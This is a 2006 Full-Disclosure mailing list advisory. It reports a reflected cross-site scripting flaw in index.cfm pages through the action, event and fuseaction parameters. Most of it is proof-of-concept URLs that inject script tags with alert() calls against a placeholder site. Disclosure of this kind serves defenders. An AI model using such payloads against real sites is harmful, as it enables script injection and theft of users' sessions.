[Full-disclosure] New Ploblem in Index.cfm
saied hackeriran
saiedhackeriran at yahoo.com
Wed Jul 19 14:12:49 BST 2006
In The Name Of God
Discoverer:SaiedHacker
Group:HackeranShiraz
Critical Level : Dangerous
This matter happens in index.cfm when
We want to run some specific Functions
Such as action,event,.... and hacker
Can start attacks such as XSS attack by
Using simple script or HtML code.
Exploit:
Http://www.Site.com/path/index.cfm?action=<script>
Http://www.Site.com/path/index.cfm?event=<script>
Http://www.Site.com/path/index.cfm?fuseaction=<script>
Xss:
Http://www.Site.com/path/index.cfm?action=<script>alert("SaiedHacker");</script>
Http://www.Site.com/path/index.cfm?event=<script>alert("SaiedHacker");</script>
Http://www.Site.com/path/index.cfm?fuseaction=<script>alert("SaiedHacker");</script>
Have fun
SaiedHackerIran at yahoo.com
www.SaiedHackerPro.PersianBlog.com
__________________________________________________
Do You Yahoo!?
Tired of spam? Yahoo! Mail has the best spam protection around
http://mail.yahoo.com
Full-Disclosure is hosted and sponsored by Secunia.